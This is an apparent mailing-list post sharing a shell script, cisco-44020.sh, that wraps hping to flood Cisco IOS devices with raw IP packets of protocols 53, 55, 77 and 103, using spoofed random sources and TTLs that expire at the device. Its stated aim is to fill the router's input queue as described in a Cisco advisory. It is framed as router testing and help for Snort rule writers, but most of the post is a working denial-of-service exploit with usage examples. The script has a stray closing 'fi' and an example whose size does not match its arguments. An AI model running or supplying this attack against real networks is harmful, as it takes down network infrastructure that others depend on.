Here's a simple script I wrote to test our routers and switches.. maybe it will come in handy for your research. I also sent an early version to the snort-users list to help them develop rules. Basically it just wraps hping (http://www.hping.org) with parameters passed on the command line. Try targeting a host inside the network and playing around with the TTL.

--
Patrick Donahue
Network/Systems Administrator
ACMI Corporation

--- BEGIN cisco-44020.sh ---
#!/bin/sh

# 2003-07-21 pdonahue
# cisco-44020.sh
# -- this shell script is just a wrapper for hping (http://www.hping.org)
#    with the parameters necessary to fill the input queue on exploitable IOS device
# -- refer to "Cisco Security Advisory: Cisco IOS Interface Blocked by IPv4 Packets"
#    (http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml) for more information

HPING=/usr/local/sbin/hping
# -- change this path to match the location of hping on your system

# set defaults
PROT=a
ADDR=r
NUMB=76
SIZE=26

# check usage
if [ "$#" -lt "2" ]; then
    echo "usage: $0 <hostname|address> <ttl> [-p<protocol>] [-a<address>] [-n<packets>] [-s<size>]"
    echo "        required:"
    echo "            <hostname|address> is the target device (router/switch)"
    echo "            <ttl> must be set so the packets expire (TTL=0) at the device"
    echo "        optional:"
    echo "            -p <protocol> is (a)ll, (53)swipe, (55)ip mobility, (77)sun nd, or (103)pim"
    echo "            -a <address>  is the source address of the packets; (r)andom or x.x.x.x"
    echo "            -n <packets>  is the number of packets to send"
    echo "            -s <size>     is the size of the payload in bytes"
    echo "        defaults:"
    echo "            $0 <hostname|address> <ttl> -p$PROT -a$ADDR -n$NUMB -s$SIZE"
    echo "        examples:"
    echo "            $0 10.0.0.1 0"
    echo "            76 (each proto)  26-byte packets : random add. -> 10.0.0.1"
    echo "            $0 10.0.0.100 11 -ps -a10.0.0.1 -n76 -s256"
    echo "            76 (swipe only) 512-byte packets : 10.0.0.1    -> 10 hops -> 10.0.0.100"
    exit
else
    HOST=$1; shift; TTL=$1; shift;
fi

# parse arguments
while getopts p:a:n:s: o
do  case "$o" in
    p)  # set the protocol
        PROT="$OPTARG"
        ;;
    a)  # set the source address
        [ "$OPTARG" != "r" ] && ADDR="-a $OPTARG"
        ;;
    n)  # set the number of packets
        NUMB="$OPTARG"
        ;;
    s)  # set the size of the payload
        SIZE="$OPTARG"
        ;;
    esac
done

# replace defaults with appropriate values if still set
[ "$PROT" = "a" ] && PROT="53 55 77 103"
[ "$ADDR" = "r" ] && ADDR="--rand-source"

# send the packets
for protocol in $PROT
    do
       $HPING $HOST --rawip $ADDR --ttl $TTL --ipproto $protocol --count $NUMB --interval u250 --data $SIZE --file /dev/urandom
    done
    exit
fi
--- END cisco-44020.sh ---